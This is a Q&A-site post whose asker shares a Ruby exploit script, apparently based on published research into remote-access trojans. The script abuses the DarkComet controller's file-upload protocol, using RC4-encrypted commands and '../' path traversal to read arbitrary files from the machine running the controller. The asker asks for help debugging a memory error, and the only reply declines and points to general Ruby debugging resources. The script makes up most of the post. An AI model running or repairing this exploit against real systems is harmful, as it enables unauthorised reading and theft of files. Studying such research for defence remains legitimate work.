2

I stumbled across this nice paper: http://matasano.com/research/PEST-CONTROL.pdf

This shows some Reverse Engineering of RATs.

Now, the second Exploit interests me, it's a python script. Found another one

require 'rc4'
require 'socket'
require 'hex_string'
require 'timeout'

class Util

    def initialize (key__, socket__, h__, p__)
        @key__ = key__
        @socket__ = socket__
        @h__ = h__
        @p__ = p__
    end

    def cryptfordc(thing)
        RC4.new(@key__).encrypt(thing).to_hex_string.upcase.gsub! ' ',''
    end

    def grabfile(name)
        @xx=cryptfordc('QUICKUP133|%s|UPLOADEXEC' % name)
        @socket__.write(@xx)
        begin
                timeout(3) do
                        @socket__.recvfrom(1024)
                        @socket__.recvfrom(1024)
                end
        rescue Timeout::Error
            STDERR.write "Timeout; Or the file is not there.rn"
            exit
        end
        @socket__.write('x00')
        x=''
        while 1
            aa=@socket__.recvfrom(1000000)
            if aa.nil? || aa.empty?
                break
            else
                x=x+aa.join
                begin
                    @socket__.write('x00')
                rescue Errno::EPIPE
                    break
                end
            end
        end
        return x
    end

    def testt(path)

        @utemp = cryptfordc('QUICKUP111|%s|UPLOADEXEC' % (path+'NTUSER.INI'))
        @socket__.write(@utemp)
        begin
            timeout(3) do
                @socket__.recvfrom(1024)
                @socket__.recvfrom(1024)
            end
            rescue Timeout::Error
                resetsock()
                return false
            end
        return true
    end
    def resetsock
        @socket__=TCPSocket.open(@h__,@p__)
        @socket__.recvfrom(12)
    end
    def finduserprofile
        @upath = "../"
        while 1
            if(testt(@upath) == false)
                @upath=@upath+"../"
            else
                break
            end
        end
        return @upath
    end
end

h=String(ARGV[0])
p=Integer(ARGV[1])
s=TCPSocket.open(h,p)
s.recvfrom(1024)
uu=Util.new('#KCMDDC51#-890'+ARGV[2], s, h, p)
dd = uu.finduserprofile()
uu.resetsock()
STDERR.write dd+"rn"
STDOUT.write uu.grabfile('%s%s'% [dd, ARGV[3]])

It's Ruby. I have fixed some errors in it, now I can't seem to manage to run it at all. I start the DarkComet client listening on port 1604, everything seems fine. I guess this code is missing a part... The initial connection?

Did some analysis and still can't manage to.

The error I get is:

../rndc.rb:31:in `recvfrom': failed to allocate memory (NoMemoryError)
        from dc.rb:31:in `grabfile'
        from dc.rb:85:in `<main>'

What to do? Any help is appreciated. Purpose of this is learning. I want to see it practically and analyze it further!

Nima Derakhshanjan
  • 1,380
  • 9
  • 24
  • 37
Shanell Robertson
  • 21
  • 2
  • I'm afraid we won't be able to debug this for you--there's not enough information here. However, you may find that learning how to debug Ruby will be helpful to you. See questions such as this one: http://stackoverflow.com/questions/3955688/how-do-i-debug-ruby-scripts and also google for "debugging Ruby". Please come back and ask specific, answerable questions when you have them and we'll help. – Wayne Conrad Jul 31 '15 at 21:13

0 Answers0